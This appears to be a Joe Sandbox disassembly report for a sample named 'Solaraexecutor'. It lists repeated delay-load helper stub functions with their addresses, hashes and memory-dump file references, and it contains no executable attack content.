Opcode ID: afe96936b1930b92e0087b4437402695bed2f05a538686ac60b43d98b00e5722
Instruction ID: b3e80ebecca082d06bf53d443942fb0a4b25cc73481bcfbf8200c360e4dce543
Opcode Fuzzy Hash: afe96936b1930b92e0087b4437402695bed2f05a538686ac60b43d98b00e5722
Instruction Fuzzy Hash: 33B012C166C210BC310461945D06C37035CC0C0F15730522EFC08C11C0EC404E090571

Function 00D3E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bf70376790f22ee0c2bad907f9b24c1f932e9b0d806089b18852d1ff3abdabb2
Instruction ID: 48488be0de80d7e2089346547cfbca07e3e387fa20f8139fdb4c1f10496916a3
Opcode Fuzzy Hash: bf70376790f22ee0c2bad907f9b24c1f932e9b0d806089b18852d1ff3abdabb2
Instruction Fuzzy Hash: E6B012C1668200BC360461089C03C3B030CC0C1F15730522EFC18C01C0E8404D8C1571

Function 00D3E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c08dfcba3518b1c6f3fef99ea140d6dc6f47689d35e9766cc8b906f8845c471
Instruction ID: fe47faaacb73251a8421d30b52c0291669002cedc65c17f152c7b3583fe58644
Opcode Fuzzy Hash: 0c08dfcba3518b1c6f3fef99ea140d6dc6f47689d35e9766cc8b906f8845c471
Instruction Fuzzy Hash: 25B012C1668100BC350421241C06C3B030CC0C1F15B30503EFC64C04C1A8404E4C0471

Function 00D3E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 06de44a3ea9f287733301b2ef670de457328c8d1f8b0a601b0257ed230420ea0
Instruction ID: e9265229b51ee1c0b7587155ab00446dc3d3004e43a4fdb78d517cf298f51a60
Opcode Fuzzy Hash: 06de44a3ea9f287733301b2ef670de457328c8d1f8b0a601b0257ed230420ea0
Instruction Fuzzy Hash: 5AB012C1668100BE350461091C02D3B030CC0C1F15730502EFC18C01C0E8404D480571

Function 00D3E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5c0aefd8e6f30fae85531787ecf5777c7bcf0f551c1bd63fedbb1e6e8f9e7a3d
Instruction ID: bb95fb74185c7677f0ea6bc0dba28a428071af8618254e908b4b4fc40859b8ea
Opcode Fuzzy Hash: 5c0aefd8e6f30fae85531787ecf5777c7bcf0f551c1bd63fedbb1e6e8f9e7a3d
Instruction Fuzzy Hash: 10B012C1668140BD350461091D02C3B070CC0C1F15730902EFC18C42C0E8404D490571

Function 00D3E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c3ca8237eae03e8333c9c1e2f8721e1c652433f489f277e691aaa5471c450404
Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
Opcode Fuzzy Hash: c3ca8237eae03e8333c9c1e2f8721e1c652433f489f277e691aaa5471c450404
Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1

Function 00D3E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 22130a96ff640958c1652a5362255066d378daa1ba9cc7cce561f2b630c6b48a
Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
Opcode Fuzzy Hash: 22130a96ff640958c1652a5362255066d378daa1ba9cc7cce561f2b630c6b48a
Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1

Function 00D3E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 88a9be98720376daa688faa3060c4f323ce32eaa6b4697bca95418c3699e6589
Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
Opcode Fuzzy Hash: 88a9be98720376daa688faa3060c4f323ce32eaa6b4697bca95418c3699e6589
Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1

Function 00D3E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2813bd2fa2ffb5c62810269732d7b48c49f8ce8b919e7dd3a081b0a76c2d1041
Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
Opcode Fuzzy Hash: 2813bd2fa2ffb5c62810269732d7b48c49f8ce8b919e7dd3a081b0a76c2d1041
Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1

Function 00D3E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f7ca3aeb0906809b05647c7cc570bf002abff4fc068c2bce6d9b4f6b0c284cf3
Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
Opcode Fuzzy Hash: f7ca3aeb0906809b05647c7cc570bf002abff4fc068c2bce6d9b4f6b0c284cf3
Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1

Function 00D3E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8ecad677173f297c4b0aae917fdfbbbdddde2aa7bf3dc7eb21c2cd4a0532e6e3
Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
Opcode Fuzzy Hash: 8ecad677173f297c4b0aae917fdfbbbdddde2aa7bf3dc7eb21c2cd4a0532e6e3
Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1

Function 00D3E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f734a7a0d6bea59c507d1ee94a43a2065de158679d73a9bd01666573f29a3ff8
Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
Opcode Fuzzy Hash: f734a7a0d6bea59c507d1ee94a43a2065de158679d73a9bd01666573f29a3ff8
Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1

Function 00D3E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0a3404f94c38de87a761fc40d8ee05ce1cdcf1b7903b9fa12eaf17e5cc2260bb
Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
Opcode Fuzzy Hash: 0a3404f94c38de87a761fc40d8ee05ce1cdcf1b7903b9fa12eaf17e5cc2260bb
Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1

Function 00D3E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2dd3283bec9a2a5aed96bbc8e7beb324f1d96dc1d5f580ef1b23a4803a4b118a
Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
Opcode Fuzzy Hash: 2dd3283bec9a2a5aed96bbc8e7beb324f1d96dc1d5f580ef1b23a4803a4b118a
Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1

Function 00D3E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6113edc4c91e6d301e3ab93daea29f571644706e9e8ed3a8b13af841b1a0ff78
Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
Opcode Fuzzy Hash: 6113edc4c91e6d301e3ab93daea29f571644706e9e8ed3a8b13af841b1a0ff78
Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1

Function 00D3E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c78cd18a2865265e5beb2f70dd4c8c1e9925fd078c4f6a5cea10c520a2651bb9
Instruction ID: 5075160999e0829e7c72fddaefdf0873c2d582ba9b1d26050f16decca17cf308
Opcode Fuzzy Hash: c78cd18a2865265e5beb2f70dd4c8c1e9925fd078c4f6a5cea10c520a2651bb9
Instruction Fuzzy Hash: 64A001E6AAA242FC3508A2926D06C3B031DC4C5B66B30996EFC56C44C1A890A84918B1

Function 00D3E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8cbb4289603ab51f602b0f50656376df0f9fbd30c35fae66d0ef60c782c7129e
Instruction ID: d94a08356b622340ebacc20e0d291d4d72d8b1d98c69a20aac2cb1664cf93f4b
Opcode Fuzzy Hash: 8cbb4289603ab51f602b0f50656376df0f9fbd30c35fae66d0ef60c782c7129e
Instruction Fuzzy Hash: 31A001E66A9252BD350862516D16C3B435DC4C2B2BB30A52EFC65A54D1AC80594A18B2

Function 00D3E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

